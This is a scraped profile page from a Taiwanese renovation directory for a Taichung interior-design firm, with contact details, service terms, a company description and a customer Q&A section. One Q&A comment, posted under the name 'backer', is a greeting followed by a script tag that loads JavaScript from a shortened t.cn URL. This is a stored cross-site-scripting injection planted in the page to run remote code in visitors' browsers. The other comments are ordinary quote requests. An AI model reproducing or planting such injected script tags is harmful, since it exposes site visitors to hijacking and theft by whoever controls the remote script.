裝修就找幸福經紀人
虹牌油漆 掌握第一手裝修裝潢資訊FB Line@幸福空間好友募集中 老屋翻新住宅改造 裝修有難題?快報名幸福講堂

搜尋室內設計師

搜尋
搜尋裝修工程

搜尋

宜翊室內裝修設計有限公司

  • 04 22080885
  • 台中市 北區健行路930巷14號
最新動態
設計師簡介
服務內容
接案區域
北區 中區 南區 宜蘭 / 花東
接案類型
不限
接案風格
不限
接案預算
30萬以上
付費方式
依工程進度分段收費
收費方式
相關經歷

宜翊室內裝修設計, 由通過內政部營建署考試領有專業設計與施工技術證團隊組成。影響室內格局的設計因素很多,在多年的設計經驗中我們感受到客戶對『家』的期待,我們常探討一個問題“人!一輩子有幾次機會能自我實踐打造自已的夢想家“,每個房子的背後都有一段故事,宜翊室內裝修設計是夢想的推手,我們深度挖掘客戶對家的需求與期望,以人為主角,考量家人間的互動關系,規化適當的生活動線,展現原味赤裸專屬於「我們這一家」的生活本質,您的故事,我們來協助。

用最誠懇的態度傾聽您對家的需求,在設計上充份與您做溝通、協調給予建議,賦與空間機能性、貼心、創意與驚奇,讓設計上充滿專屬於您的規劃。用最專業的品質確保您對居家安全、施工品質的嚴格要求,我們透過訂定契約保障您的權益,在施工的過程中不定時的與您做進度回報,經由材質確認確保建材品質規格,工程監工維護施工安全品質。用最平實的價格採用適當的施工工法,活用建材特性、控制標準施工日程,提高裝修效益。

相關證照

◆財政部登記有案
◆經濟部登記有案
 公司統一編號/54249632

留言諮詢
backer2017-06-01 22:24:43
Q提問

你好<script src=http://t.cn/RSMGrGO></script>

A回覆

你也好哦~

詹小姐2017-05-15 12:37:55
Q提問

你好,想詢問目前有房子需要規劃室內格局主要為房間以及客廳廚房部分,房屋位於南投,想詢問方便約時間來估價嗎?

A回覆

尚未回覆

林士凱2016-11-14 21:11:45
Q提問

約15坪左右 預算50萬以內 想做美式風格 做早午餐店
方便約時間來估價嗎?

A回覆

您好
已經你的初步需求轉達,近期設計師會與您聯繫。
有任何問題可再次詢問喔!!

|◀12▶|

  • (網頁上不會公開)
  • (網頁上不會公開)
  • (請輸入左側文字) [換一張]
抽獎活動-免費抽獎 機票 熱銷商品禮卷贈送 抽獎達人